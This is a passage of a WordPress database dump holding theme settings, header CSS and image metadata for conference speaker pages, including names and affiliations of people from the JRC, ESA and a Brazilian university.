(23432,3497,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(23433,3497,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(23434,3497,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(23435,3497,'_dt_project_options_back_button',''),
(23436,3497,'_dt_project_options_show_link',''),
(23437,3497,'_dt_project_options_link',''),
(23438,3497,'_dt_project_options_link_target',''),
(23439,3497,'_dt_project_options_link_name',''),
(23440,3497,'_dt_project_options_hide_thumbnail','1'),
(23441,3497,'_dt_project_options_open_thumbnail_in_lightbox','0'),
(23442,3497,'_dt_project_options_related_mode','same'),
(23443,3497,'_dt_project_options_preview','normal'),
(23444,3497,'the7_fancy_title_css','.fancy-header {\n  background-image: url(\'https://gsw2023.com/wp-content/uploads/2023/01/w26m1-1.jpg\');\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #000000;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(23445,3502,'_edit_lock','1672599689:1'),
(23446,3503,'_wp_attached_file','2023/01/w271.jpg'),
(23447,3503,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:149;s:6:\"height\";i:163;s:4:\"file\";s:16:\"2023/01/w271.jpg\";s:8:\"filesize\";i:48777;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"w271-149x150.jpg\";s:5:\"width\";i:149;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7584;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(23448,3502,'_thumbnail_id','3503'),
(23449,3502,'_edit_last','1'),
(23450,3502,'_dt_sidebar_position','disabled'),
(23451,3502,'_dt_sidebar_widgetarea_id','sidebar_1'),
(23452,3502,'_dt_sidebar_hide_on_mobile','0'),
(23453,3502,'_dt_footer_show','1'),
(23454,3502,'_dt_footer_widgetarea_id','sidebar_2'),
(23455,3502,'_dt_footer_hide_on_mobile','0'),
(23456,3502,'_dt_header_title','fancy'),
(23457,3502,'_dt_header_background','normal'),
(23458,3502,'_dt_header_background_below_slideshow','disabled'),
(23459,3502,'_dt_header_transparent_bg_color_scheme','light'),
(23460,3502,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(23461,3502,'_dt_header_transparent_top_bar_bg_opacity','25'),
(23462,3502,'_dt_header_transparent_bg_color','#000000'),
(23463,3502,'_dt_header_transparent_bg_opacity','50'),
(23464,3502,'_dt_header_disabled_background','normal'),
(23465,3502,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(23466,3502,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(23467,3502,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(23468,3502,'_dt_header_disabled_transparent_bg_color','#000000'),
(23469,3502,'_dt_header_disabled_transparent_bg_opacity','50'),
(23470,3502,'_dt_page_overrides_top_margin',''),
(23471,3502,'_dt_page_overrides_right_margin',''),
(23472,3502,'_dt_page_overrides_bottom_margin',''),
(23473,3502,'_dt_page_overrides_left_margin',''),
(23474,3502,'_dt_mobile_page_padding_top',''),
(23475,3502,'_dt_mobile_page_padding_right',''),
(23476,3502,'_dt_mobile_page_padding_bottom',''),
(23477,3502,'_dt_mobile_page_padding_left',''),
(23478,3502,'_dt_fancy_header_layout_heading',''),
(23479,3502,'_dt_fancy_header_title_aligment','center'),
(23480,3502,'_dt_fancy_header_height','300'),
(23481,3502,'_dt_fancy_header_padding-top','0px'),
(23482,3502,'_dt_fancy_header_padding-bottom','0px'),
(23483,3502,'_dt_fancy_header_breadcrumbs_heading',''),
(23484,3502,'_dt_fancy_header_breadcrumbs','disabled'),
(23485,3502,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(23486,3502,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(23487,3502,'_dt_fancy_header_title_heading',''),
(23488,3502,'_dt_fancy_header_title_mode','custom'),
(23489,3502,'_dt_fancy_header_title','Marco Minghini'),
(23490,3502,'_dt_fancy_header_title_font_size','30'),
(23491,3502,'_dt_fancy_header_title_line_height','36'),
(23492,3502,'_dt_fancy_header_text_transform','none'),
(23493,3502,'_dt_fancy_header_title_color_mode','color'),
(23494,3502,'_dt_fancy_header_title_color','#ffffff'),
(23495,3502,'_dt_fancy_header_subtitle_heading',''),
(23496,3502,'_dt_fancy_header_subtitle','European Commission - Joint Research Centre (JRC) Digital Economy Unit, Italy (ICWG IV/III/II)'),
(23497,3502,'_dt_fancy_header_subtitle_font_size','18'),
(23498,3502,'_dt_fancy_header_subtitle_line_height','26'),
(23499,3502,'_dt_fancy_header_subtitle_text_transform','none'),
(23500,3502,'_dt_fancy_header_subtitle_color_mode','color'),
(23501,3502,'_dt_fancy_header_subtitle_color','#ffffff'),
(23502,3502,'_dt_fancy_header_bg_heading',''),
(23503,3502,'_dt_fancy_header_bg_color','#222222'),
(23504,3502,'_dt_fancy_header_bg_image_origin','custom'),
(23505,3502,'_dt_fancy_header_bg_image','a:0:{}'),
(23506,3502,'_dt_fancy_header_bg_repeat','no-repeat'),
(23507,3502,'_dt_fancy_header_bg_position_x','center'),
(23508,3502,'_dt_fancy_header_bg_position_y','center'),
(23509,3502,'_dt_fancy_header_bg_fullscreen','1'),
(23510,3502,'_dt_fancy_header_bg_overlay','0'),
(23511,3502,'_dt_fancy_header_overlay_color','#000'),
(23512,3502,'_dt_fancy_header_bg_overlay_opacity','50'),
(23513,3502,'_dt_fancy_header_scroll_effect','default'),
(23514,3502,'_dt_fancy_header_bg_parallax','0.5'),
(23515,3502,'_dt_fancy_header_responsiveness_heading',''),
(23516,3502,'_dt_fancy_header_responsiveness','disabled'),
(23517,3502,'_dt_fancy_header_responsiveness_switch','778px'),
(23518,3502,'_dt_fancy_header_responsive_height','70'),
(23519,3502,'_dt_fancy_header_responsive_font_size','30'),
(23520,3502,'_dt_fancy_header_responsive_title_line_height','38'),
(23521,3502,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(23522,3502,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(23523,3502,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(23524,3502,'_dt_teammate_options_go_to_single','1'),
(23525,3502,'_dt_teammate_options_position',''),
(23526,3502,'_dt_teammate_options_website',''),
(23527,3502,'_dt_teammate_options_mail',''),
(23528,3502,'_dt_teammate_options_facebook',''),
(23529,3502,'_dt_teammate_options_twitter',''),
(23530,3502,'_dt_teammate_options_dribbble',''),
(23531,3502,'_dt_teammate_options_you-tube',''),
(23532,3502,'_dt_teammate_options_rss',''),
(23533,3502,'_dt_teammate_options_delicious',''),
(23534,3502,'_dt_teammate_options_flickr',''),
(23535,3502,'_dt_teammate_options_lastfm',''),
(23536,3502,'_dt_teammate_options_linkedin',''),
(23537,3502,'_dt_teammate_options_vimeo',''),
(23538,3502,'_dt_teammate_options_tumbler',''),
(23539,3502,'_dt_teammate_options_pinterest',''),
(23540,3502,'_dt_teammate_options_devian',''),
(23541,3502,'_dt_teammate_options_skype',''),
(23542,3502,'_dt_teammate_options_github',''),
(23543,3502,'_dt_teammate_options_instagram',''),
(23544,3502,'_dt_teammate_options_stumbleupon',''),
(23545,3502,'_dt_teammate_options_behance',''),
(23546,3502,'_dt_teammate_options_px-500',''),
(23547,3502,'_dt_teammate_options_tripedvisor',''),
(23548,3502,'_dt_teammate_options_vk',''),
(23549,3502,'_dt_teammate_options_foursquare',''),
(23550,3502,'_dt_teammate_options_xing',''),
(23551,3502,'_dt_teammate_options_weibo',''),
(23552,3502,'_dt_teammate_options_odnoklassniki',''),
(23553,3502,'_dt_teammate_options_research-gate',''),
(23554,3502,'_dt_teammate_options_yelp',''),
(23555,3502,'_dt_teammate_options_blogger',''),
(23556,3502,'_dt_teammate_options_soundcloud',''),
(23557,3502,'_dt_teammate_options_viber',''),
(23558,3502,'_dt_teammate_options_whatsapp',''),
(23559,3502,'_dt_teammate_options_reddit',''),
(23560,3502,'_dt_teammate_options_snapchat',''),
(23561,3502,'_dt_teammate_options_telegram',''),
(23562,3502,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(23563,3504,'_edit_lock','1672599681:1'),
(23564,3505,'_wp_attached_file','2023/01/w272.jpg'),
(23565,3505,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:150;s:6:\"height\";i:160;s:4:\"file\";s:16:\"2023/01/w272.jpg\";s:8:\"filesize\";i:34342;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"w272-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5375;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(23566,3504,'_thumbnail_id','3505'),
(23567,3504,'_edit_last','1'),
(23568,3504,'_dt_sidebar_position','disabled'),
(23569,3504,'_dt_sidebar_widgetarea_id','sidebar_1'),
(23570,3504,'_dt_sidebar_hide_on_mobile','0'),
(23571,3504,'_dt_footer_show','1'),
(23572,3504,'_dt_footer_widgetarea_id','sidebar_2'),
(23573,3504,'_dt_footer_hide_on_mobile','0'),
(23574,3504,'_dt_header_title','fancy'),
(23575,3504,'_dt_header_background','normal'),
(23576,3504,'_dt_header_background_below_slideshow','disabled'),
(23577,3504,'_dt_header_transparent_bg_color_scheme','light'),
(23578,3504,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(23579,3504,'_dt_header_transparent_top_bar_bg_opacity','25'),
(23580,3504,'_dt_header_transparent_bg_color','#000000'),
(23581,3504,'_dt_header_transparent_bg_opacity','50'),
(23582,3504,'_dt_header_disabled_background','normal'),
(23583,3504,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(23584,3504,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(23585,3504,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(23586,3504,'_dt_header_disabled_transparent_bg_color','#000000'),
(23587,3504,'_dt_header_disabled_transparent_bg_opacity','50'),
(23588,3504,'_dt_page_overrides_top_margin',''),
(23589,3504,'_dt_page_overrides_right_margin',''),
(23590,3504,'_dt_page_overrides_bottom_margin',''),
(23591,3504,'_dt_page_overrides_left_margin',''),
(23592,3504,'_dt_mobile_page_padding_top',''),
(23593,3504,'_dt_mobile_page_padding_right',''),
(23594,3504,'_dt_mobile_page_padding_bottom',''),
(23595,3504,'_dt_mobile_page_padding_left',''),
(23596,3504,'_dt_fancy_header_layout_heading',''),
(23597,3504,'_dt_fancy_header_title_aligment','center'),
(23598,3504,'_dt_fancy_header_height','300'),
(23599,3504,'_dt_fancy_header_padding-top','0px'),
(23600,3504,'_dt_fancy_header_padding-bottom','0px'),
(23601,3504,'_dt_fancy_header_breadcrumbs_heading',''),
(23602,3504,'_dt_fancy_header_breadcrumbs','disabled'),
(23603,3504,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(23604,3504,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(23605,3504,'_dt_fancy_header_title_heading',''),
(23606,3504,'_dt_fancy_header_title_mode','custom'),
(23607,3504,'_dt_fancy_header_title','Anca Anghelea'),
(23608,3504,'_dt_fancy_header_title_font_size','30'),
(23609,3504,'_dt_fancy_header_title_line_height','36'),
(23610,3504,'_dt_fancy_header_text_transform','none'),
(23611,3504,'_dt_fancy_header_title_color_mode','color'),
(23612,3504,'_dt_fancy_header_title_color','#ffffff'),
(23613,3504,'_dt_fancy_header_subtitle_heading',''),
(23614,3504,'_dt_fancy_header_subtitle','Department of Science, Applications and Climate D/EOP, European Space Agency, Italy (ICWG IV/III/II)'),
(23615,3504,'_dt_fancy_header_subtitle_font_size','18'),
(23616,3504,'_dt_fancy_header_subtitle_line_height','26'),
(23617,3504,'_dt_fancy_header_subtitle_text_transform','none'),
(23618,3504,'_dt_fancy_header_subtitle_color_mode','color'),
(23619,3504,'_dt_fancy_header_subtitle_color','#ffffff'),
(23620,3504,'_dt_fancy_header_bg_heading',''),
(23621,3504,'_dt_fancy_header_bg_color','#222222'),
(23622,3504,'_dt_fancy_header_bg_image_origin','custom'),
(23623,3504,'_dt_fancy_header_bg_image','a:0:{}'),
(23624,3504,'_dt_fancy_header_bg_repeat','no-repeat'),
(23625,3504,'_dt_fancy_header_bg_position_x','center'),
(23626,3504,'_dt_fancy_header_bg_position_y','center'),
(23627,3504,'_dt_fancy_header_bg_fullscreen','1'),
(23628,3504,'_dt_fancy_header_bg_overlay','0'),
(23629,3504,'_dt_fancy_header_overlay_color','#000'),
(23630,3504,'_dt_fancy_header_bg_overlay_opacity','50'),
(23631,3504,'_dt_fancy_header_scroll_effect','default'),
(23632,3504,'_dt_fancy_header_bg_parallax','0.5'),
(23633,3504,'_dt_fancy_header_responsiveness_heading',''),
(23634,3504,'_dt_fancy_header_responsiveness','disabled'),
(23635,3504,'_dt_fancy_header_responsiveness_switch','778px'),
(23636,3504,'_dt_fancy_header_responsive_height','70'),
(23637,3504,'_dt_fancy_header_responsive_font_size','30'),
(23638,3504,'_dt_fancy_header_responsive_title_line_height','38'),
(23639,3504,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(23640,3504,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(23641,3504,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(23642,3504,'_dt_teammate_options_go_to_single','1'),
(23643,3504,'_dt_teammate_options_position',''),
(23644,3504,'_dt_teammate_options_website',''),
(23645,3504,'_dt_teammate_options_mail',''),
(23646,3504,'_dt_teammate_options_facebook',''),
(23647,3504,'_dt_teammate_options_twitter',''),
(23648,3504,'_dt_teammate_options_dribbble',''),
(23649,3504,'_dt_teammate_options_you-tube',''),
(23650,3504,'_dt_teammate_options_rss',''),
(23651,3504,'_dt_teammate_options_delicious',''),
(23652,3504,'_dt_teammate_options_flickr',''),
(23653,3504,'_dt_teammate_options_lastfm',''),
(23654,3504,'_dt_teammate_options_linkedin',''),
(23655,3504,'_dt_teammate_options_vimeo',''),
(23656,3504,'_dt_teammate_options_tumbler',''),
(23657,3504,'_dt_teammate_options_pinterest',''),
(23658,3504,'_dt_teammate_options_devian',''),
(23659,3504,'_dt_teammate_options_skype',''),
(23660,3504,'_dt_teammate_options_github',''),
(23661,3504,'_dt_teammate_options_instagram',''),
(23662,3504,'_dt_teammate_options_stumbleupon',''),
(23663,3504,'_dt_teammate_options_behance',''),
(23664,3504,'_dt_teammate_options_px-500',''),
(23665,3504,'_dt_teammate_options_tripedvisor',''),
(23666,3504,'_dt_teammate_options_vk',''),
(23667,3504,'_dt_teammate_options_foursquare',''),
(23668,3504,'_dt_teammate_options_xing',''),
(23669,3504,'_dt_teammate_options_weibo',''),
(23670,3504,'_dt_teammate_options_odnoklassniki',''),
(23671,3504,'_dt_teammate_options_research-gate',''),
(23672,3504,'_dt_teammate_options_yelp',''),
(23673,3504,'_dt_teammate_options_blogger',''),
(23674,3504,'_dt_teammate_options_soundcloud',''),
(23675,3504,'_dt_teammate_options_viber',''),
(23676,3504,'_dt_teammate_options_whatsapp',''),
(23677,3504,'_dt_teammate_options_reddit',''),
(23678,3504,'_dt_teammate_options_snapchat',''),
(23679,3504,'_dt_teammate_options_telegram',''),
(23680,3504,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(23681,3506,'_edit_lock','1672599669:1'),
(23682,3507,'_wp_attached_file','2023/01/w273.jpg'),
(23683,3507,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:151;s:6:\"height\";i:173;s:4:\"file\";s:16:\"2023/01/w273.jpg\";s:8:\"filesize\";i:36997;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"w273-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5145;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(23684,3506,'_thumbnail_id','3507'),
(23685,3506,'_edit_last','1'),
(23686,3506,'_dt_sidebar_position','disabled'),
(23687,3506,'_dt_sidebar_widgetarea_id','sidebar_1'),
(23688,3506,'_dt_sidebar_hide_on_mobile','0'),
(23689,3506,'_dt_footer_show','1'),
(23690,3506,'_dt_footer_widgetarea_id','sidebar_2'),
(23691,3506,'_dt_footer_hide_on_mobile','0'),
(23692,3506,'_dt_header_title','fancy'),
(23693,3506,'_dt_header_background','normal'),
(23694,3506,'_dt_header_background_below_slideshow','disabled'),
(23695,3506,'_dt_header_transparent_bg_color_scheme','light'),
(23696,3506,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(23697,3506,'_dt_header_transparent_top_bar_bg_opacity','25'),
(23698,3506,'_dt_header_transparent_bg_color','#000000'),
(23699,3506,'_dt_header_transparent_bg_opacity','50'),
(23700,3506,'_dt_header_disabled_background','normal'),
(23701,3506,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(23702,3506,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(23703,3506,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(23704,3506,'_dt_header_disabled_transparent_bg_color','#000000'),
(23705,3506,'_dt_header_disabled_transparent_bg_opacity','50'),
(23706,3506,'_dt_page_overrides_top_margin',''),
(23707,3506,'_dt_page_overrides_right_margin',''),
(23708,3506,'_dt_page_overrides_bottom_margin',''),
(23709,3506,'_dt_page_overrides_left_margin',''),
(23710,3506,'_dt_mobile_page_padding_top',''),
(23711,3506,'_dt_mobile_page_padding_right',''),
(23712,3506,'_dt_mobile_page_padding_bottom',''),
(23713,3506,'_dt_mobile_page_padding_left',''),
(23714,3506,'_dt_fancy_header_layout_heading',''),
(23715,3506,'_dt_fancy_header_title_aligment','center'),
(23716,3506,'_dt_fancy_header_height','300'),
(23717,3506,'_dt_fancy_header_padding-top','0px'),
(23718,3506,'_dt_fancy_header_padding-bottom','0px'),
(23719,3506,'_dt_fancy_header_breadcrumbs_heading',''),
(23720,3506,'_dt_fancy_header_breadcrumbs','disabled'),
(23721,3506,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(23722,3506,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(23723,3506,'_dt_fancy_header_title_heading',''),
(23724,3506,'_dt_fancy_header_title_mode','custom'),
(23725,3506,'_dt_fancy_header_title',''),
(23726,3506,'_dt_fancy_header_title_font_size','30'),
(23727,3506,'_dt_fancy_header_title_line_height','36'),
(23728,3506,'_dt_fancy_header_text_transform','none'),
(23729,3506,'_dt_fancy_header_title_color_mode','color'),
(23730,3506,'_dt_fancy_header_title_color','#ffffff'),
(23731,3506,'_dt_fancy_header_subtitle_heading',''),
(23732,3506,'_dt_fancy_header_subtitle','Universidade Federal do Paraná, Brazil (ICWG IV/III/II)'),
(23733,3506,'_dt_fancy_header_subtitle_font_size','18'),
(23734,3506,'_dt_fancy_header_subtitle_line_height','26'),
(23735,3506,'_dt_fancy_header_subtitle_text_transform','none'),
(23736,3506,'_dt_fancy_header_subtitle_color_mode','color'),
(23737,3506,'_dt_fancy_header_subtitle_color','#ffffff'),
(23738,3506,'_dt_fancy_header_bg_heading',''),
(23739,3506,'_dt_fancy_header_bg_color','#222222'),
(23740,3506,'_dt_fancy_header_bg_image_origin','custom'),
(23741,3506,'_dt_fancy_header_bg_image','a:0:{}'),
(23742,3506,'_dt_fancy_header_bg_repeat','no-repeat'),
(23743,3506,'_dt_fancy_header_bg_position_x','center'),
(23744,3506,'_dt_fancy_header_bg_position_y','center'),
(23745,3506,'_dt_fancy_header_bg_fullscreen','1'),
(23746,3506,'_dt_fancy_header_bg_overlay','0'),
(23747,3506,'_dt_fancy_header_overlay_color','#000'),
(23748,3506,'_dt_fancy_header_bg_overlay_opacity','50'),
(23749,3506,'_dt_fancy_header_scroll_effect','default'),
(23750,3506,'_dt_fancy_header_bg_parallax','0.5'),
(23751,3506,'_dt_fancy_header_responsiveness_heading',''),
(23752,3506,'_dt_fancy_header_responsiveness','disabled'),
(23753,3506,'_dt_fancy_header_responsiveness_switch','778px'),
(23754,3506,'_dt_fancy_header_responsive_height','70'),
(23755,3506,'_dt_fancy_header_responsive_font_size','30'),
(23756,3506,'_dt_fancy_header_responsive_title_line_height','38'),
(23757,3506,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(23758,3506,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(23759,3506,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(23760,3506,'_dt_teammate_options_go_to_single','1'),
(23761,3506,'_dt_teammate_options_position',''),
(23762,3506,'_dt_teammate_options_website',''),
(23763,3506,'_dt_teammate_options_mail',''),
(23764,3506,'_dt_teammate_options_facebook',''),
(23765,3506,'_dt_teammate_options_twitter',''),
(23766,3506,'_dt_teammate_options_dribbble',''),
(23767,3506,'_dt_teammate_options_you-tube',''),
(23768,3506,'_dt_teammate_options_rss',''),
(23769,3506,'_dt_teammate_options_delicious',''),
(23770,3506,'_dt_teammate_options_flickr',''),
(23771,3506,'_dt_teammate_options_lastfm',''),
(23772,3506,'_dt_teammate_options_linkedin',''),
(23773,3506,'_dt_teammate_options_vimeo',''),
(23774,3506,'_dt_teammate_options_tumbler',''),
(23775,3506,'_dt_teammate_options_pinterest',''),
(23776,3506,'_dt_teammate_options_devian',''),
(23777,3506,'_dt_teammate_options_skype',''),
(23778,3506,'_dt_teammate_options_github',''),
(23779,3506,'_dt_teammate_options_instagram',''),
(23780,3506,'_dt_teammate_options_stumbleupon',''),
(23781,3506,'_dt_teammate_options_behance',''),
(23782,3506,'_dt_teammate_options_px-500',''),
(23783,3506,'_dt_teammate_options_tripedvisor',''),
(23784,3506,'_dt_teammate_options_vk',''),
(23785,3506,'_dt_teammate_options_foursquare',''),
(23786,3506,'_dt_teammate_options_xing',''),
(23787,3506,'_dt_teammate_options_weibo',''),
(23788,3506,'_dt_teammate_options_odnoklassniki',''),
(23789,3506,'_dt_teammate_options_research-gate',''),
(23790,3506,'_dt_teammate_options_yelp',''),
(23791,3506,'_dt_teammate_options_blogger',''),
(23792,3506,'_dt_teammate_options_soundcloud',''),
(23793,3506,'_dt_teammate_options_viber',''),
(23794,3506,'_dt_teammate_options_whatsapp',''),
(23795,3506,'_dt_teammate_options_reddit',''),
(23796,3506,'_dt_teammate_options_snapchat',''),
(23797,3506,'_dt_teammate_options_telegram',''),
